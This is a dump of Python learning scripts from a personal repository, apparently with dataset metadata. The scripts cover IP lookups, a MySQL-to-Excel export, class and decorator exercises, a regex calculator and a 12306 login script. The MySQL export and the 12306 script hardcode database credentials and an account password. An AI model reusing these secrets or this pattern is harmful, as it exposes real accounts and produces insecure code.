'deactivated',\n 'after': 'notify_administrators_of_deactivation'\n },\n]\n" }, { "alpha_fraction": 0.5364526510238647, "alphanum_fraction": 0.5364526510238647, "avg_line_length": 26.02941131591797, "blob_id": "4b1303227313c8caac922f05e9a8038776819096", "content_id": "eb5bd56c02c2e440793980f128665ee77fa19703", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 919, "license_type": "permissive", "max_line_length": 61, "num_lines": 34, "path": "/accounts/serializers.py", "repo_name": "joaoalves2010/lookit-api", "src_encoding": "UTF-8", "text": "from accounts.models import DemographicData, User\nfrom rest_framework_json_api import serializers\n\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = '__all__'\n\n\nclass DemographicDataSerializer(serializers.ModelSerializer):\n user = UserSerializer()\n class Meta:\n model = DemographicData\n fields = (\n 'user',\n 'number_of_children',\n 'child_birthdays',\n 'languages_spoken_at_home',\n 'number_of_guardians',\n 'number_of_guardians_explanation',\n 'race_identification',\n 'age',\n 'gender',\n 'education_level',\n 'spouse_education_level',\n 'annual_income',\n 'number_of_books',\n 'additional_comments',\n 'country',\n 'state',\n 'density',\n 'extra',\n )\n" } ]
21
dragon434/untitled
https://github.com/dragon434/untitled
0d2401c798299b24038f395820844d9149caffa7
07a6c5edd01ff84c02dfd979fa5fc8b84a30415a
69649a0f77c44140b7c8570c7b449e6179b37e48
refs/heads/master
2021-04-15T16:56:12.853596
2020-03-16T08:56:02
2020-03-16T08:56:02
126,658,595
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5513447523117065, "alphanum_fraction": 0.6039119958877563, "avg_line_length": 23.787878036499023, "blob_id": "c20790442d75c09f30b75df6254dfe58a85956d5", "content_id": "ae835f2f7b6a0bb58aface39404713327652a2b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 76, "num_lines": 33, "path": "/未定义项目练习/get_ip_info.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-07-02\n\n__author__ = '@jiawenlong'\n\nimport requests\nimport os\n\n\n# curl -s ipinfo.io/$(curl -s http://ipv4.icanhazip.com )\n\ndef get_ip_info(ip):\n r = requests.get(\"http://ip.taobao.com//service/getIpInfo.php?ip=\" + ip)\n info = r.json()[\"data\"]\n # print(info)\n print(\"IP:\", info[\"ip\"])\n print(\"国家:\", info[\"country\"])\n print(\"省份:\", info[\"region\"])\n print(\"城市:\", info[\"city\"])\n print(\"供应商:\", info['isp'])\n\n\nget_ip_info(requests.get(\"http://ipv4.icanhazip.com\").text.rstrip(\"\\r\\n\"))\nprint()\nget_ip_info(\"140.143.136.250\")\n# print()\n# get_ip_info(\"116.62.8.82\")\n# print()\n# get_ip_info(\"8.8.8.8\")\n# print(requests.get(\"http://ipinfo.io/60.190.99.37\").json())\n# print(type(requests.get(\"http://ipv4.icanhazip.com\").text))\n" }, { "alpha_fraction": 0.5051762461662292, "alphanum_fraction": 0.5313851237297058, "avg_line_length": 34.165897369384766, "blob_id": "d0af90bfc8ec536cf28681ddfdc7a1fbfd5cc0cb", "content_id": "af1a9a1a67549b8fc384c1ef7f64de2503aa01c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8765, "license_type": "no_license", "max_line_length": 410, "num_lines": 217, "path": "/未定义项目练习/select_mysql_to_execl.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-07-05\n\n__author__ = '@jiawenlong'\n\nimport pymysql, xlwt\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\ndef export_excel(table_name, sql):\n conn = pymysql.connect(user=user, host=host, port=port, passwd=passwd, db=db, charset='utf8')\n cur = conn.cursor()\n cur.execute(sql)\n fileds = [filed[0] for filed in cur.description]\n all_data = cur.fetchall()\n # 写excel\n book = xlwt.Workbook()\n sheet = book.add_sheet('sheet1')\n for col, field in enumerate(fileds):\n sheet.write(0, col, field)\n\n # 从第一行开始写\n row = 1\n for data in all_data:\n for col, field in enumerate(data):\n sheet.write(row, col, field)\n row += 1\n book.save('%s.xls' % table_name)\n\n\ndef give_time():\n today = datetime.today()\n today_date = datetime.date(today) - timedelta(days=1)\n return str(today_date)\n\n\nif __name__ == \"__main__\":\n host = 'rm-bp1l97d3ioa1b9058.mysql.rds.aliyuncs.com'\n user = 'tom_read'\n passwd = 'System123456'\n db = 'tom_system'\n port = 3306\n sql = \"select case channel when 0 then '好升益' when 1 then '母婴' when 2 then '倍全' when 3 then '阳光物业' when 4 then '酒知己' end 租户,id 店铺id,name 店铺名称,FROM_UNIXTIME(creation_time/1000, '%Y-%m-%d %H:%i:%s') 店铺创建时间 from t_store where creation_time>=(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d'))-24*60*60)*1000 and creation_time<(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d')))*1000 order by channel,creation_time;\"\n Yesterday = give_time()\n execl_file = '/tmp/新开店铺信息_' + Yesterday\n export_excel(execl_file, sql)\n\n\n\n\n\n\n # # __Desc__ = 从数据库中导出数据到excel数据表中\n # import xlwt\n # import pymysql\n # from datetime import datetime\n # from datetime import timedelta\n #\n #\n # class MYSQL:\n # def __init__(self):\n # pass\n #\n # def __del__(self):\n # self._cursor.close()\n # self._connect.close()\n #\n # def connectDB(self):\n # \"\"\"\n # 连接数据库\n # :return:\n # \"\"\"\n # try:\n # self._connect = pymysql.Connect(\n # host='127.0.0.1',\n # port=3306,\n # user='tom_read',\n # passwd='System123456',\n # db='tom_system',\n # charset='utf8'\n # )\n #\n # return 0\n # except:\n # return -1\n #\n # def export(self, sqll, output_path):\n # self._cursor = self._connect.cursor()\n # count = self._cursor.execute(sqll)\n # # print(self._cursor.lastrowid)\n # print(count)\n # # 重置游标的位置\n # self._cursor.scroll(0, mode='absolute')\n # # 搜取所有结果\n # results = self._cursor.fetchall()\n #\n # # 获取MYSQL里面的数据字段名称\n # fields = self._cursor.description\n # workbook = xlwt.Workbook()\n #\n # # 注意: 在add_sheet时, 置参数cell_overwrite_ok=True, 可以覆盖原单元格中数据。\n # # cell_overwrite_ok默认为False, 覆盖的话, 会抛出异常.\n # sheet = workbook.add_sheet('tablename', cell_overwrite_ok=True)\n #\n # # 写上字段信息\n # for field in range(0, len(fields)):\n # sheet.write(0, field, fields[field][0])\n #\n # # 获取并写入数据段信息\n # row = 1\n # col = 0\n # for row in range(1,len(results)+1):\n # for col in range(0, len(fields)):\n # sheet.write(row, col, u'%s' % results[row-1][col])\n #\n # # 获取当前日期,得到一个datetime对象如:(2016, 8, 9, 23, 12, 23, 424000)\n # today = datetime.today()\n # # 将获取到的datetime对象仅取日期如:2016-8-9 Yesteday\n # today_date = datetime.date(today) - timedelta(days=1)\n #\n # workbook.save(output_path + str(today_date) + '.xls')\n #\n #\n # if __name__ == '__main__':\n # excel_path = '/Users/admin/Downloads/'\n # sql = \"select case channel when 0 then '好升益' when 1 then '母婴' when 2 then '倍全' when 3 then '阳光物业' when 4 then '酒知己' end 租户,id 店铺id,name 店铺名称,FROM_UNIXTIME(creation_time/1000, '%Y-%m-%d %H:%i:%s') 店铺创建时间 from t_store where creation_time>=(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d'))-24*60*60)*1000 and creation_time<(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d')))*1000 order by channel,creation_time;\"\n # mysql = MYSQL()\n # flag = mysql.connectDB()\n # if flag == -1:\n # print('数据库连接失败')\n # else:\n # print('数据库连接成功')\n # mysql.export(sql, excel_path)\n\n\n\n\n # ==================== 不同的方法\n\n\n # 以下是python2执行\n # import sys\n # import time\n # import xlwt\n # import MySQLdb\n # from datetime import datetime\n # from datetime import timedelta\n # import json\n #\n # # host = 'rm-bp1l97d3ioa1b9058.mysql.rds.aliyuncs.com'\n # host = '127.0.0.1'\n # user = 'tom_read'\n # passwd = 'System123456'\n # db = 'tom_system'\n # port = 3306\n # sql = \"select case channel when 0 then '好升益' when 1 then '母婴' when 2 then '倍全' when 3 then '阳光物业' when 4 then '酒知己' end 租户,id 店铺id,name 店铺名称,FROM_UNIXTIME(creation_time/1000, '%Y-%m-%d %H:%i:%s') 店铺创建时间 from t_store where creation_time>=(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d'))-24*60*60)*1000 and creation_time<(UNIX_TIMESTAMP(DATE_FORMAT(now(), '%y%m%d')))*1000 order by channel,creation_time;\"\n # # sql=\"select * from t_store limit 10;\"\n # table_head = ['租户', '店铺id', '店铺名称', '店铺创建时间']\n # excel_path = '/Users/admin/Downloads'\n #\n # def get_data(sql):\n # # 创建数据库连接.\n # conn = MySQLdb.connect(host, user, passwd, db, port, charset='utf8')\n # # 创建游标\n # cur = conn.cursor()\n # # 执行查询,\n # cur.execute(sql)\n # # 由于查询语句仅会返回受影响的记录条数并不会返回数据库中实际的值,所以此处需要fetchall()来获取所有内容。\n # result = cur.fetchall()\n # # 关闭游标\n # cur.close()\n # # 关闭数据库连接\n # conn.close\n # # 返给结果给函数调用者。\n # return result\n #\n #\n # def write_data_to_excel(name, sql):\n # # 将sql作为参数传递调用get_data并将结果赋值给result,(result为一个嵌套元组)\n # result = get_data(sql)\n # # print result\n # # 实例化一个Workbook()对象(即excel文件)\n # wbk = xlwt.Workbook()\n # # 新建一个名为Sheet1的excel sheet。此处的cell_overwrite_ok =True是为了能对同一个单元格重复操作。\n # sheet = wbk.add_sheet('Sheet1', cell_overwrite_ok=True)\n # # 获取当前日期,得到一个datetime对象如:(2016, 8, 9, 23, 12, 23, 424000)\n # today = datetime.today()\n # # print today\n # # 将获取到的datetime对象仅取日期如:2016-8-9 Yesteday\n # today_date = datetime.date(today) - timedelta(days=1)\n # # print today_date\n # # 遍历result中的没个元素。\n # for i in xrange(len(result)):\n # # 对result的每个子元素作遍历,\n # # print i,result[i]\n # for j in xrange(len(result[i])):\n # # 将每一行的每个元素按行号i,列号j,写入到excel中。\n # # print j,result[i][j]\n # # for i in xrange(len(['租户','店铺id','店铺名称','店铺创建时间'])):\n # # sheet.write(0,i,table_head[0][i])\n # # i+=1\n # sheet.write(i, j, result[i][j])\n # # 以传递的name+当前日期作为excel名称保存。\n # wbk.save(excel_path + name + str(today_date) + '.xls')\n #\n #\n # # 如果该文件不是被import,则执行下面代码。\n # if __name__ == '__main__':\n # # 定义一个字典,key为对应的数据类型也用作excel命名,value为查询语句\n # db_dict = {'新开店铺信息-': sql}\n # # 遍历字典每个元素的key和value。\n # for k, v in db_dict.items():\n # # 用字典的每个key和value调用write_data_to_excel函数。\n # write_data_to_excel(k, v)\n" }, { "alpha_fraction": 0.5535373091697693, "alphanum_fraction": 0.5831739902496338, "avg_line_length": 13.121622085571289, "blob_id": "991d722c6d4f8c0244c1cf9760e684ee41aa6495", "content_id": "ce65e0a80fb766283dedf42e88d9c34902ff3f69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 46, "num_lines": 74, "path": "/python学习/面向对象学习/反射.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-02\n\n__author__ = '@jiawenlong'\n\n\nclass Foo:\n stat = '123'\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def show(self):\n return \"%s-%s\" % (self.name, self.age)\n\n\nobj = Foo('alex', 19)\n\n# getattr 获取类对象成员的属性\nb = \"name\"\n# print(obj.__dict__[b])\n\n# 去什么东西里面获取什么属性\n# print(getattr(obj, \"name\"))\n# print(getattr(obj, b))\n\n# 获取类里的方法\n# func = getattr(obj, \"show\")\n# r = func()\n# print(r)\n\n# getattr(obj, \"name\") 获取对象属性\n# hasattr(obj, 'name') 判断对象属性是否存在\n# setattr(obj, 'k1', 'v1') 设置对象属性\n# delattr(obj, 'name') 删除对象属性\n# 通过字符串形式 操作对象中的成员\n\n\n# r = getattr(Foo, 'stat')\n# print(r)\n\n'''\nimport s2\n\n\nr1 = getattr(s2, 'Name')\nprint(r1)\n\nr2 = getattr(s2, 'func')\nprint(r2)\nv = r2()\nprint(v)\n\ncls = getattr(s2, 'Foo')\nprint(cls)\nprint(obj)\nobj = cls()\nprint(obj.name)\n'''\n\n\n# 例子\nimport s2\ninp = input('请输入要查看的Url:')\n\nif hasattr(s2, inp):\n func = getattr(s2, inp)\n result = func()\n print(result)\nelse:\n print('404')\n\n" }, { "alpha_fraction": 0.61387038230896, "alphanum_fraction": 0.6547546982765198, "avg_line_length": 22.920289993286133, "blob_id": "7d75453e75a7b65de0163c21ae3e7cb990d957df", "content_id": "a1ddc20ead6506558e5dce813d68704415c570d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4026, "license_type": "no_license", "max_line_length": 143, "num_lines": 138, "path": "/12306/fuck12306_login.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jiawenlong\n\nimport urllib2\nimport urllib\nimport ssl\nimport cookielib\nimport json\nimport sys\nfrom fuck12306_check_seat import check_seat\n\n\n# 1 访问前需要login\n# 2 请求前要其他操作\n# 3 关联session : 是否是相同的ip 操作 cookie 验证\n# 12306 登陆过程\n# 1. 请求登陆页面\n# 2. 获取验证码\n# 3. 请求验证码url做验证\n# 4. 验证正确,请求登陆页面\n# 5. 验证用户名密码,登陆\n# 4 处理验证码\n# 5 查询车票\n# 6 预定车票\n# 1 查询到车票后,验证用户,需要用到cookie或者session https://kyfw.12306.cn/otn/login/checkUser\n# 2 根据返回参数,为ture 预定车票:https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest\n\n### cookie 生成\n# c = cookielib.LWPCookieJar()\n# cookie = urllib2.HTTPCookieProcessor()\n# opener = urllib2.build_opener(cookie)\n\n### cookie 保存到文件\ncookiefile = 'cookie.txt'\nc = cookielib.MozillaCookieJar(cookiefile)\ncookie = urllib2.HTTPCookieProcessor(c)\nopener = urllib2.build_opener(cookie)\n\n# 忽略证书认证\nssl._create_default_https_context = ssl._create_unverified_context\n\n## 请求验证码,保存图片\n# login 地址 带验证码的\ncodeimg_url = 'https://kyfw.12306.cn/otn/login/init'\n#验证码图片地址\ncode_img = 'https://kyfw.12306.cn/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand&0.06510420729186484'\n#校验验证码的地址\ncodeimg_request_url = 'https://kyfw.12306.cn/passport/captcha/captcha-check'\n# 真正的登陆地址\nlogin_url = 'https://kyfw.12306.cn/passport/web/login'\n\n\ndef add_header(req, url):\n # 对请求 添加 header\n req.add_header('User-Agent',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36')\n req.add_header('Referer', url)\n\n\ndef receive_img():\n # 把 验证码 保存到当前目录 code.png\n req = urllib2.Request(code_img)\n add_header(req, codeimg_url)\n\n # 保存验证码图片\n codeimg = opener.open(req).read()\n with open('code.png', 'wb') as fn:\n fn.write(codeimg)\n\n\ndef input_codeimg():\n # 手动输入验证码坐标 如:248,105\n code = raw_input('[248,105,109,52,259,53]>>>>>>')\n # 验证验证码\n req = urllib2.Request(codeimg_request_url)\n data = {\n 'answer': code, # 验证码\n 'login_site': 'E',\n 'rand': 'sjrand'\n }\n # 把字典类型转换成查询字符串,post的字符串[a=1&b=2]\n data = urllib.urlencode(data)\n print \"请求验证码的url的参数:\", data\n add_header(req, codeimg_url)\n\n #需要带上cookie\n html = opener.open(req, data=data).read()\n # c.save(ignore_discard=True, ignore_expires=True)\n print \"验证码验证后返回参数:\", html\n return html\n\n\ndef login():\n req = urllib2.Request(login_url)\n add_header(req, codeimg_url)\n data = {\n 'username': '[email protected]',\n 'password': '434wode434',\n 'appid': 'otn'\n }\n data = urllib.urlencode(data) # 把字典类型转换成查询字符串,post的字符串[a=1&b=2]\n print \"请求登陆url的参数:\", data\n\n html = opener.open(req, data=data).read()\n c.save(ignore_discard=True, ignore_expires=True)\n print \"登陆请求验证返回参数:\", html\n return html\n\n\n\n\nprint cookie,c\nprint opener\nreceive_img()\n# print(html)\n# #判断验证码是否验证成功\nresult = json.loads(input_codeimg())\nif result['result_code'] == '4':\n print('验证码校验成功')\nelse:\n print('验证码校验失败')\n sys.exit()\n\n\n# print(html)\n# 判断验证码成功后,判断登陆是否成功\nresult = json.loads(login())\nif result['result_code'] == 0:\n print('登录成功')\n c.save(ignore_discard=True, ignore_expires=True)\n print(\"查询是否有票\")\n check_seat()\n print(\"有票,买票,点选验证码\")\n print(\"没票,继续刷新\")\nelse:\n print('登录失败')\n sys.exit()\n\n" }, { "alpha_fraction": 0.4478986859321594, "alphanum_fraction": 0.46171560883522034, "avg_line_length": 16.3700008392334, "blob_id": "cd6a490aab1d0879bc00df2c8e657c57ba8407e5", "content_id": "11c80c0c690f23e7ab96e6ce00ce0496897ad7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1809, "license_type": "no_license", "max_line_length": 70, "num_lines": 100, "path": "/python学习/函数/装饰器练习.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jia wen long\n\n\n# 闭包\n# def outer(x=\"哈哈哈哈\"):\n# print(\"do something\")\n# c = 10\n#\n# def inner():\n# print(x, c)\n# # return x\n#\n# return inner\n#\n#\n# func = outer()\n# func()\n\n\n# 装饰器\nimport time\n\n\ndef showtime(func):\n def jtime():\n start_time = time.time()\n func()\n stop_time = time.time()\n print(\"%s Spend %s\" % (func.__name__, stop_time - start_time))\n return jtime\n\n\n@showtime\ndef home():\n print(\"This is home Page\")\n time.sleep(2)\n\n\ndef phone():\n print(\"This is phone Page\")\n time.sleep(2)\n\n\n@showtime\ndef jr():\n print(\"This is jr Page\")\n time.sleep(2)\n\n\nhome()\nprint()\nphone()\nprint()\njr()\n\n\n# login_status = \"False\"\n# username = \"jiawenlong\"\n# password = \"123456\"\n#\n# def check_login():\n# print(\"out\" % login_status)\n# def login():\n# global login_status\n# print(login_status)\n# if login_status != \"True\":\n# print(login_status)\n# login_status = \"True\"\n#\n# # user = raw_input(\"请输入用户名: \")\n# # passwd = raw_input(\"请输入密码: \")\n# # if user == username and passwd == password:\n# # page()\n# # login_status = \"True\"\n# # else:\n# # print(\"用户名密码错误!!\")\n# # else:\n# # page()\n# return login\n#\n#\n# f=check_login()\n# print(f())\n\n\n# def foo(*args, **kwargs):\n# print 'args = ', args\n# print 'kwargs = ', kwargs\n# print '---------------------------------------'\n#\n#\n# if __name__ == '__main__':\n# foo(1, 2, 3, 4)\n# foo(a=1, b=2, c=3)\n# foo(1, 2, 3, 4, a=1, b=2, c=3)\n# foo('a', 1, None, a=1, b='2', c=3)\n\n# 装饰器练习\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 18, "blob_id": "f2df55dfe690ebbc8cd3f4a1b4ee3c5f9d7b31ee", "content_id": "ac5415160f42da93c743f2763de501b769e2f6dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/未定义项目练习/笨方法.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-07-04\n\n__author__ = '@jiawenlong'\n\n" }, { "alpha_fraction": 0.5471394062042236, "alphanum_fraction": 0.5624496340751648, "avg_line_length": 13.264368057250977, "blob_id": "796a2e4328ff7b3bf43ff9662ada50e3de3ecf8f", "content_id": "2d86467d7fe7fc9e58933751c071bb45b9fa27b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1501, "license_type": "no_license", "max_line_length": 44, "num_lines": 87, "path": "/python学习/面向对象学习/class_字段方法属性.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-20\n\n__author__ = '@jiawenlong'\n\n\nclass province:\n # 静态字段\n country = '中国'\n\n def __init__(self, name):\n # 普通字段\n self.name = name\n self.L = ['jiawenlong']\n\n # 普通方法\n def bar(self):\n print('Bar')\n\n # 静态方法\n @staticmethod\n def sta(name, age):\n print(name, age)\n\n # 类方法\n @classmethod\n def classmd(cls):\n # cls 类名\n print('classmd')\n\n # 属性\n @property # 用于执行 obj.per\n def per(self):\n return self.L\n\n @per.setter\n def per(self, val):\n self.L.append(val)\n print(self.L)\n\n @per.deleter\n def per(self):\n del self.L[1]\n print(self.L)\n\n\n\"\"\"\n# 静态字段使用\nprint(province.country)\n\nhn = province('河南')\nprint(hn.name)\n\nhn.name = \"河南男\"\nprint(hn.name)\n\nhb = province('河北')\nhb.country = '美国'\nprint(hb.country, hb.name)\n\n# 普通方法调用\nobj = province('hh')\nobj.bar()\nobj.sta(1, 2)\nobj.classmd()\n#\n# 静态方法调用 节省内存\nprovince.sta(1, 2)\n\n# 类方法调用 节省内存\nprovince.classmd()\n\"\"\"\n\n# 应用场景\n# 1 如果对象中需要保存一些值,执行某功能时,需要使用对象中的值 --- 使用普通方法\n# 2 不需要任何对象中的值 --- 使用静态方法\n\n# 属性调用\nobj = province('aaa')\n# obj.per # print(\"Per\")\nret = obj.per\nprint(ret)\nobj.per = 111\n\ndel obj.per\n" }, { "alpha_fraction": 0.4534865617752075, "alphanum_fraction": 0.49774810671806335, "avg_line_length": 28.2681827545166, "blob_id": "7e61d53f2d27f506b672ca413308b0d94909f6d9", "content_id": "c7cc4a390d57613a93a2711c52c235774255ebde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6547, "license_type": "no_license", "max_line_length": 98, "num_lines": 220, "path": "/python学习/python作业/re正则作业计算器.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/11/14 22:11\n\n__author__ = 'JiaWenLong'\n\nimport re\n\n\n# 运算符 未完成\n# print(re.search('-?\\d+\\.?\\d{0,}(?P<operator>[+_*/])-?\\d+\\.?\\d{0,}', inter_js).group('operator'))\n# print(isinstance(-40, int))\n# print(isinstance(5.0, float))\n\n\n# 定义相关函数\ndef is_float(n):\n try:\n return float(re.search('-?\\d+\\.\\d+', n).group())\n except AttributeError:\n return False\n\n\ndef is_int(n):\n try:\n if is_float(n):\n return is_float(n)\n else:\n return int(re.search('-?\\d+', n).group())\n except AttributeError:\n return False\n\n\ndef muti_div(s):\n operation = re.compile('(?P<front>\\d+\\.?\\d*)(?P<operators>[*/])(?P<behind>-?\\d+\\.?\\d*)')\n res = s\n i = 0\n while i < len(re.findall('[*/]', s)):\n # print('muti_div ', res)\n opt = operation.search(res).group('operators')\n a = is_int(operation.search(res).group('front'))\n b = is_int(operation.search(res).group('behind'))\n expre_ssion = operation.search(res).group()\n\n # print('mut_div_Front_Behind_():', a, b)\n if opt == '*':\n result = a * b\n res = res.replace(expre_ssion, str(result))\n # print('*', res)\n # return muti_result\n else:\n # if isinstance(a, float) or isinstance(b, float):\n result = a / b\n res = res.replace(expre_ssion, str(result))\n # print('/', res)\n # return div_result\n # else:\n # result = a // b\n # res = res.replace(expre_ssion, str(result))\n # # print('//', res)\n # # return div_result\n i += 1\n # print('final', res)\n # print('='*50)\n return res\n\n\ndef add_minus(s):\n operation = re.compile('(?P<front>-?\\d+\\.?\\d*)(?P<operators>[+-])(?P<behind>\\d+\\.?\\d*)')\n s = format_strings(s)\n res = s\n # print('add_minux: ', res)\n\n try:\n operation.search(res).group('operators')\n except :\n return res\n\n i = 0\n if re.search('\\(-', s) or re.search('^-', s):\n j = len(re.findall('[+-]', s)) - 1\n else:\n j = len(re.findall('[+-]', s))\n\n while i < j:\n opt = operation.search(res).group('operators')\n a = is_int(operation.search(res).group('front'))\n b = is_int(operation.search(res).group('behind'))\n expre_ssion = operation.search(res).group()\n\n # print('add_minus_Front_Behind_():', a, b, s)\n if opt == '+':\n result = a + b\n res = res.replace(expre_ssion, str(result))\n else:\n result = a - b\n res = res.replace(expre_ssion, str(result))\n\n i += 1\n # print(res)\n return res\n\n\ndef format_strings(s):\n string = s.replace('++', '+')\n string = string.replace('+-', '-')\n string = string.replace('--', '+')\n string = string.replace('-+', '-')\n string = string.replace(' ', '')\n return string\n\ns1 = '1-2*((60-30+(9-2*5)*(9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*3)/(16-3*2)*(-40/5+6))'\ns2 = '1 - 2 * ((60-30 + (-40/(-5)) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*-3)/(16-3*2))'\ns = '1 - 2 * ((60-30 + (40/-5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(4*(-3))/(16-3*2))'\n\nprint('eval:', eval(s))\nwhile re.search('\\(', s):\n\n # print('yuan: ', s)\n s = format_strings(s)\n brackets = re.compile('\\([^()]+\\)')\n expressions = brackets.findall(s)\n mv_brackets = re.compile('\\(([-+]?\\d+.?\\d*)\\)')\n\n # print('=' * 30)\n for expression in expressions:\n # print('E: ', expression)\n # expression = brackets.search(s).group()\n resault = muti_div(expression)\n finalyt = add_minus(resault)\n s = s.replace(expression, finalyt)\n # print('R', s)\n s = mv_brackets.sub(r'\\1', s)\n # print('mv_brackets: ', s)\n s = format_strings(s)\n # print('format: ', s)\nelse:\n resault = muti_div(s)\n # print(resault)\n finalyt = add_minus(resault)\n # print(finalyt)\n s = s.replace(s, finalyt)\nprint('Finally: ', s)\n\n# 关键在于 r\n# bold = re.compile(r'\\*{2}(.*?)\\*{2}')\n# text = 'Make this **cai**. This **junsheng**.'\n# print('Text:', text)\n# print('Bold:', bold.sub(r'<b>\\1</b>', text))\n\n# strings = s\n# while re.search('\\(', strings):\n# expression = brackets.search(s).group()\n# resault = muti_div(expression)\n# finalyt = add_minus(resault)\n# strings = strings.replace(expression, finalyt)\n# print('R', strings.replace(expression, finalyt))\n# # print('='*30)\n# else:\n# muti_div(strings)\n# add_minus(strings)\n\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# # 获取所有括号和内部的表达式\n# brackets = re.compile('\\([^()]+\\)')\n# inter_brackets = brackets.findall(s)\n# print('inter_brackets', inter_brackets)\n# # 运算符判断\n# ope = re.compile('\\d+\\.?\\d{0,}(?P<operators>[+\\-*/])\\d+\\.?\\d{0,}')\n# # operator = ope.search(inter_brackets[0]).group('operators')\n# # print(operator)\n# print('inter_brackets[0]', inter_brackets[0])\n#\n# # 浮点数 或者 整数 匹配\n# flaodORint = re.findall('-?\\d+\\.?\\d{0,}', inter_brackets[0])\n# print('flaodORint :', flaodORint)\n#\n# for i in range(0, len(flaodORint)):\n# NEXT = i+1\n# # print(NEXT)\n# if NEXT < len(flaodORint):\n# print(flaodORint[i], flaodORint[NEXT])\n# operator = ope.search(inter_brackets[0]).group('operators')\n# if operator == '+' or operator == '-':\n# value = add_minus('9-2*5')\n# if operator == '*' or operator == '/':\n# value = muti_div('9-2.7*5')\n#\n# print(value)\n# ret = muti_div('9-2.7*5')\n# print('ret', ret)\n# print(add_minus('9-2.8*5'))\n\n\n# #######################################################\n# s = '1 - 2 * ((60-30 + (5-40/5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*3)/(16-3*2))'\n# s1 = '1 - 2 * ((60-30 + (-40/(-5)) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*(-3))/(16-3*2))'\n# s2 = '1 - 2 * ((60-30 + (40/-5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(4*(-3))/(16-3*2))'\n#\n# inter_kh = re.search('\\([^()]+\\)', s).group()\n# inter_js = re.sub('[()]', '', inter_kh)\n# print(inter_js, inter_kh)\n# ope = re.compile('\\d+\\.?\\d{0,}(?P<operators>[+\\-*/])\\d+\\.?\\d{0,}')\n# operator = ope.search(inter_js).group('operators')\n# print(operator)\n#\n# # 浮点数 或者整数匹配\n# l_n = re.findall('-?\\d+\\.?\\d{0,}', inter_js)\n# print('l_n :', l_n)\n#\n#\n\n#\n\n#\n#\n# # print(is_int(l_n[0]) / is_int(l_n[1]))\n# print(value)\n# print(re.sub('-8+5', str(value), s))\n" }, { "alpha_fraction": 0.47717392444610596, "alphanum_fraction": 0.498913049697876, "avg_line_length": 14.0819673538208, "blob_id": "2eabd145c9ca4bdc7b2750016832b7495ffc7f2e", "content_id": "046b9b930d2b7f8e5a861086b9c395200cb1ea6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1114, "license_type": "no_license", "max_line_length": 73, "num_lines": 61, "path": "/python学习/面向对象学习/class_封装.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-19\n\n__author__ = '@jiawenlong'\n\n'''\n面向对象,三大特性\n1. 封装\n2. 继承\n3. 多态\n'''\n\n\n# class one:\n# def echo(self, info):\n# print(\"%s, %s, %s, %s\" % (self.name, self.age, self.sex, info))\n#\n#\n# o = one()\n# o.name = '小明'\n# o.age = 19\n# o.sex = '男'\n# o.echo(\"上山去打柴\")\n# o.echo('最爱大保健')\n# 